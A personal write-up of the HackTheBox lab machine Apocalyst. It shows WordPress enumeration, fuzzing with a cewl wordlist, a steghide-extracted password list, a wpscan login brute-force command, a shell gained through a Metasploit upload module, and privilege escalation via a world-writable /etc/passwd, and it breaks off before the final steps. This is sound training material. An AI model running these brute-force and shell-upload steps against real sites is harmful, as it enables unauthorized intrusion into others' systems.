HackTheBox - Apocalyst Writeup

This writeup is for one of the Retired boxes on HackTheBox called Apocalyst [1].

Step 1 - Recon

I started my initial reconnaissance with Nmap, Udp-proto-scanner, Nikto and Dirbuster. Starting with Nmap we have nmap -sS -A -T4 --top-ports 500, but nothing important really, just ports 22 and 80 open.

Next step, I added in my /etc/hosts file the line apocalyst.htb and then used Nikto: nikto -h http://apocalyst.htb/.

Based on Nikto results and after visiting port 80, we identify that it is a Wordpress site with loads of interesting folders. However, my next step was to fire Dirbuster and check the results. Dirbuster gave back loads of 200 responses with folders that all contained the same image. That looked a bit odd and I assumed that the image probably has to do something with the challenge. Moving on, I fired wpscan as a last resort and checked the results. The scans I will mostly perform with wpscan are

 wpscan --url http://apocalyst.htb/
 wpscan --url http://apocalyst.htb/ --enumerate u
 wpscan --url http://apocalyst.htb/ --wordlist rockyou.txt --username user
The second allows someone to identify/enumerate all the users on the website and the third to brute force the wp-login page using a wordlist and a username.

With Wordpress a few of the exploits you should keep in mind are:

  1. Exploiting XMLRPC in Wordpress [2]
  2. Brute Force the login page
  3. Content Injection Vulnerability Wordpress Rest API [3]
  4. Using a Plugin with a known vulnerability

To sum up, based on the results we have so far, there is no known exploit or "mistake" that we can use. The only thing that doesn't add up is the existance of more than 30 folders that contain the same image.

Tools used so far:

 1. nmap
 2. udp-proto-scanner
 3. nikto
 4. dirbuster
 5. wpscan

Step 2 - Hint

I have to say, I couldn't think of anything else at this point. Apparently, based on dirbuster, all the folders had the same size and all the images too. I knew I was close but I asked for advice in the slack channel and they told me to check out a tool called cewl. Cewl allows you to create custom wordlists by spidering a targets website and collecting unique words.

cewl -w save.txt http://apocalyst.htb/

Step 3 - Exploit

That was it, I knew exactly what to do now. Fired cewl, save the results in a file and then gave it to wfuzz with the following command.

wfuzz -w results.txt --sc 200 http://apocalyst.htb/FUZZ

Finally, I found the folder!!

So, I downloaded the Rightiousness/image.jpg file. Looks, like a Steganography challenge, so time to check if we can solve it using one of the tools below:

 1. stegsolve
 2. steghide
 3. stego helper identification tool - SHIT
 4. exiftools, foremost, hexdump, strings

Steghide gave me the answer, just run:

steghide --extract -sf index_Rightiousness.jpg

The result is a list.txt file, so I used wpscan to brute force the login page with the list.txt and falaraki as username.

Now that we have a username and password the fastest way to get a shell is though a Metasploit module called wp_admin_shell_upload.

Step 4 - Getting Root ..{PrivEsc}..

Accessing the user's home folder we see the user.txt file and some extra info, a file called .secret. If you open the .secret file, you will see a base64 encoded string. This is the falaraki's password to connect via ssh.

Using the username and password to connect via ssh we get a better shell, so we can move on and examine the box for vulnerabilities that will allow us to escalate our privileges to root. One of the first things I usually do is:

 1. sudo -l
 2. crontab -l
 3. find / -user root -perm -4000 2>/dev/null
 4. Run a few scripts [4,5,6,7]

Up until now, this list, in my opinion, is enough to give you a pretty good idea of what's going on in the system and provides you with loads of potential issues. Issues, that you have to examine in order to see if you can exploit one of them and escalate privileges.

Apparently, with this box I wasn't paying a lot of attention in the details and so it took me a day to actually identify the issue. One of the things that g0tmi1k describes in his post is that you should pay attention to suid/sgid binaries and to world writable files and folders. Here, the issue exists in the /etc/passwd file because it is world writable and as a result someone is able to create a new root user with a hashed password. The process is described below:


[1] HackTheBox
[2] Exploiting XMLRPC in Wordpress
[3] Content Injection Vulnerability in WordPress
[4] LinEnum
[5] LinuxPrivChecker
[6] g0tmi1k Basic Linux Privilege Escalation Techniques
[7] Linux Local Enumeration Script